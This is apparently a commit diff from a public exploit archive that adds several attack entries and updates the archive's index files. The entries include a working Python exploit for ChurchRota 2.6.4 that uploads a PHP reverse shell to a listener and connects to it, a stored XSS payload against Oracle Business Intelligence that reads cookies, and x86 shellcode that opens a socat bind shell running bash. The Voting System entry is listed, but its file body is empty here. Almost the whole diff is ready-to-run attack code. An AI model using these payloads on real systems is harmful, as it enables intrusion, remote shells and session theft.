DB: 2021-01-21

4 changes to exploits/shellcodes ChurchRota 2.6.4 - RCE (Authenticated) Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) Linux/x86 - Socat Bind Shellcode (113 bytes)
2021-01-21 05:01:57 +00:00 · 2021-01-21 05:01:57 +00:00 · d65226277c
commit d65226277c
parent 62b25db87d
6 changed files with 234 additions and 0 deletions
--- a/exploits/multiple/webapps/49443.py
+++ b/exploits/multiple/webapps/49443.py
@ -0,0 +1,48 @@
+# Exploit Title: ChurchRota 2.6.4 - RCE (Authenticated)
+# Date: 1/19/2021
+# Exploit Author: Rob McCarthy (@slixperi)
+# Vendor Homepage: https://github.com/Little-Ben/ChurchRota
+# Software Link: https://github.com/Little-Ben/ChurchRota
+# Version: 2.6.4
+# Tested on: Ubuntu
+
+import requests
+from pwn import listen
+
+############################################################################################################
+# Description                                                                                              #
+# Church Rota version 2.6.4 is vulnerable to authenticated remote code execution.                          #
+# The user does not need to have file upload permission in order to upload and execute an arbitrary file.  #
+# The application is written primarily with PHP so we use PHP in our PoC                                   #
+############################################################################################################
+
+# credentials of the low privilege user
+USERNAME='slixperi'
+PASSWORD='slixperi'
+
+LISTENER_IP = '127.0.0.1'
+LISTENER_PORT = '4444'
+TARGET_IP = '127.0.0.1'
+TARGET_PORT = '8081'
+
+# set the credentials for login POST
+credentials = {"username":USERNAME,"password":PASSWORD}
+# create a session to preserve session state
+sesh = requests.session()
+# login as our low-privilege user (normally only admins can upload files)
+sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials)
+
+# define the payload
+payload = f"<?php $sock=fsockopen(\"{LISTENER_IP}\",{LISTENER_PORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>"
+
+# file upload
+sesh.headers.update({"Referer": f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=new"})
+files = {'resourcefile': ("shell.php", payload)}
+sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=newsent", files=files)
+
+l = listen(LISTENER_PORT)
+
+# execute the file
+sesh.get(f"http://{TARGET_IP}:{TARGET_PORT}/documents/shell.php")
+
+l.interactive()
--- a/exploits/multiple/webapps/49444.txt
+++ b/exploits/multiple/webapps/49444.txt
@ -0,0 +1,12 @@
+# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
+# Exploit Author: omurugur
+# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
+# Version: 11.1.1.7.140715
+# Author Web: https://www.justsecnow.com
+# Author Social: @omurugurrr
+
+Stored  XSS:
+
+“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}
+
+Vulnerable area = Dashboard - Add New Text
--- a/exploits/php/webapps/49445.py
+++ b/exploits/php/webapps/49445.py
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -25887,6 +25887,9 @@ id,file,description,date,author,type,platform,port
 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php,
+49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple,
+49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,
+49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php,
 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
 49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -1,6 +1,7 @@
 id,file,description,date,author,type,platform
 14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
 49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux
+49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Socat Bind Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86
 13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
 13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
--- a/shellcodes/linux_x86/49446.c
+++ b/shellcodes/linux_x86/49446.c
@ -0,0 +1,72 @@
+/* Exploit Title: Linux/x86 - Socat Bind Shellcode (113 bytes)
+  Date: 01-19-2021
+  Author: Felipe Winsnes
+  Tested on: Debian x86
+  Shellcode Length: 113
+
+global _start
+
+section .text
+
+_start:
+
+        xor eax, eax
+        push eax
+
+        PUSH 0x30303030 ; "tcp-listen:10000"
+        PUSH 0x313a6e65
+        PUSH 0x7473696c
+        PUSH 0x2d706374
+
+        mov esi, esp
+        push eax
+
+        PUSH 0x2c656e61 ; "exec:'bash',pty,stderr,setsid,sigint,sane,"
+        PUSH 0x732c746e
+        PUSH 0x69676973
+        PUSH 0x2c646973
+        PUSH 0x7465732c
+        PUSH 0x72726564
+        PUSH 0x74732c79
+        PUSH 0x74702c68
+        PUSH 0x7361623a
+        PUSH 0x63657865
+
+        mov edi, esp
+        push eax
+
+        PUSH 0x7461636f ; "///usr/bin/socat"
+        PUSH 0x732f6e69
+        PUSH 0x622f7273
+        PUSH 0x752f2f2f
+
+        mov ebx, esp
+        push eax
+
+        mov edx, esp
+
+        push esi
+        push edi
+        push ebx
+
+        mov ecx, esp
+        mov al, 11
+        int 0x80
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x50\x68\x30\x30\x30\x30\x68\x65\x6e\x3a\x31\x68\x6c\x69\x73\x74\x68\x74\x63\x70\x2d\x89\xe6\x50\x68\x61\x6e\x65\x2c\x68\x6e\x74\x2c\x73\x68\x73\x69\x67\x69\x68\x73\x69\x64\x2c\x68\x2c\x73\x65\x74\x68\x64\x65\x72\x72\x68\x79\x2c\x73\x74\x68\x68\x2c\x70\x74\x68\x3a\x62\x61\x73\x68\x65\x78\x65\x63\x89\xe7\x50\x68\x6f\x63\x61\x74\x68\x69\x6e\x2f\x73\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x89\xe2\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+
+  printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}